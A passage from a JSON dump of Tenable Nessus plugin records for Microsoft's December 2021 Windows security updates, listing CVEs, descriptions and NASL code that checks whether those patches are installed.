severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:10", "description": "The remote Windows host is missing security update 5008255 or cumulative update 5008277. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43245, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43236)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008255: Windows Server 2012 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40441", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43245", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008255.NASL", "href": "https://www.tenable.com/plugins/nessus/156064", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156064);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-40441\",\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43245\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008255\");\n script_xref(name:\"MSKB\", value:\"5008277\");\n script_xref(name:\"MSFT\", value:\"MS21-5008255\");\n script_xref(name:\"MSFT\", value:\"MS21-5008277\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008255: Windows Server 2012 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008255\nor cumulative update 5008277. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207,\n CVE-2021-43223, CVE-2021-43226, CVE-2021-43229,\n CVE-2021-43230, CVE-2021-43238, CVE-2021-43245,\n CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43236)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008255\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5008255 or Cumulative Update KB5008277.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008255', '5008277');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008255,5008277])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:17:11", "description": "The remote Windows host is missing security update 5008285 or cumulative update 5008263. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43245, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43236)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008285: Windows 8.1 and Windows Server 2012 R2 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40441", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43245", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008285.NASL", "href": "https://www.tenable.com/plugins/nessus/156073", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156073);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-40441\",\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43245\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5008263\");\n script_xref(name:\"MSFT\", value:\"MS21-5008285\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008285: Windows 8.1 and Windows Server 2012 R2 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008285\nor cumulative update 5008263. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207,\n CVE-2021-43223, CVE-2021-43226, CVE-2021-43229,\n CVE-2021-43230, CVE-2021-43238, CVE-2021-43245,\n CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43236)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5008285 or Cumulative Update KB5008263.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-12';\nkbs = make_list(\n '5008285',\n '5008263'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008285, 5008263])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:10", "description": "The remote Windows host is missing security update 5008207.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43238, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008207: Windows 10 Version 1607 and Windows Server 2016 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008207.NASL", "href": "https://www.tenable.com/plugins/nessus/156063", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156063);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008207\");\n script_xref(name:\"MSFT\", value:\"MS21-5008207\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008207: Windows 10 Version 1607 and Windows Server 2016 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008207.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43238, CVE-2021-43248,\n CVE-2021-43883, CVE-2021-43893)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008207\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5008207.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008207');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008207])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:35", "description": "The remote Windows host is missing security update 5008206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228, CVE-2021-43246)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236, CVE-2021-43244)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008206: Windows 10 Version 1909 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43240", "CVE-2021-43244", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008206.NASL", "href": "https://www.tenable.com/plugins/nessus/156072", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156072);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43237\",\n \"CVE-2021-43238\",\n \"CVE-2021-43240\",\n \"CVE-2021-43244\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008206\");\n script_xref(name:\"MSFT\", value:\"MS21-5008206\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008206: Windows 10 Version 1909 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228, CVE-2021-43246)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236, CVE-2021-43244)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43240, CVE-2021-43247, CVE-2021-43248,\n CVE-2021-43883, CVE-2021-43893)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008206\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5008206.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008206');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif 